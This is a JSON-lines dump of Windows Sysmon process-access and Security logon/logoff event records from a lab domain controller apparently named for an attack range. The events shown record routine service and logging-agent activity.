{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010CADF0D00}\r\nTargetProcessId: 2556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010CADF0D00}","TargetProcessId":"2556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-0010D2770D00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-0010D2770D00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-0010D2770D00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-0010D2770D00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.950\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010F9E30D00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.950","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010F9E30D00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:28.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:28.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220703,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xDE9AD\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xde9ad","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:01:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220704,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xDE9AD\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52754\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xde9ad","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52754","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:01:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220705,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xDE9AD\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xde9ad","LogonType":"3","EventReceivedTime":"2020-08-01 07:01:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:29.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:29.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
